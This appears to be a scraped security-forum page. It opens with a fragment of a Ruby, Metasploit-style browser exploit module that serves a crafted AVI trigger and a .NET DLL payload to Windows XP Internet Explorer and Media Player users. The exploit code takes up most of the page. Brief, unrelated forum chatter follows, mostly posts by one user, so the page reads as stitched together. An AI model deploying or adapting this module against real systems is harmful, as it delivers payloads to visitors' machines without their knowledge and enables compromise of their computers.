f.close
super
end
def on_request_uri(cli, request)
agent = request['User-Agent']
case request['User-Agent']
when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/
when /Windows-Media-Player/
# AVI is requested by WMP
else
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - target not supported: #{agent}")
return
end
if (request.uri =~ /\.html/i)
avi_name = rand_text_alpha(4)
avi_trigger = ""
if ("/" == get_resource[-1,1])
avi_trigger = get_resource[0, get_resource.length - 1]
else
avi_trigger = get_resource
end
avi_trigger << "/#{avi_name}.avi"
html = %Q|<html>
<body>
<OBJECT ID="MediaPlayer"
CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"
CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#
Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..."
TYPE="application/x-oleobject" width="280" height="46">
<param name="fileName" value="#{avi_trigger}">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-300">
<embed type="application/x-mplayer2"
pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
src="#{avi_trigger}"
name="MediaPlayer"
width=280
height=46
autostart=1
showcontrols=1
volume=-300>
</embed>
</OBJECT>
</body>
</html>
|
html = html.gsub(/^\t\t\t/, '')
print_status("Sending trigger loader to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
elsif (request.uri =~ /\.avi$/i)
print_status "Sending AVI trigger to #{cli.peerhost}:#{cli.peerport} ..."
send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
return
elsif (request.uri =~ /\.dll$/i)
print_status "Sending DLL file to #{cli.peerhost}:#{cli.peerport} ..."
send_response(
cli,
@dotnet_payload,
{
'Content-Type' => 'application/x-msdownload',
'Connection' => 'close',
'Pragma' => 'no-cache'
}
)
return
end
html_name = rand_text_alpha(4)
dll_uri = ""
html_trigger = ""
if ("/" == get_resource[-1,1])
dll_uri = get_resource[0, get_resource.length - 1]
html_trigger = get_resource[0, get_resource.length - 1]
else
dll_uri = get_resource
html_trigger = get_resource
end
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"
html_trigger << "/#{html_name}.html"
html = %Q|<html>
<head>
<script language="javascript">
function forward() {
window.location = window.location + '#{html_trigger}';
}
function start() {
setTimeout("forward()", 2000);
}
</script>
</head>
<body onload="start()">
<object classid="#{dll_uri}#GenericControl">
<object>
</body>
</html>
|
html = html.gsub(/^\t\t/, '')
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
end
end -
nice code.
-Gonzalez
-
Doamne fereste, mi s-o facut rau cand am vazut.
-Gonzalez
-
Coldplay - Yellow.mp3
-Gonzalez
-
-Gonzalez
-
-
GFY!
-Gonzalez
Client de IM?
in Off-topic
Posted
Web-based![:)](https://rstforums.com/forum/uploads/emoticons/default_smile.png)
-Gonzalez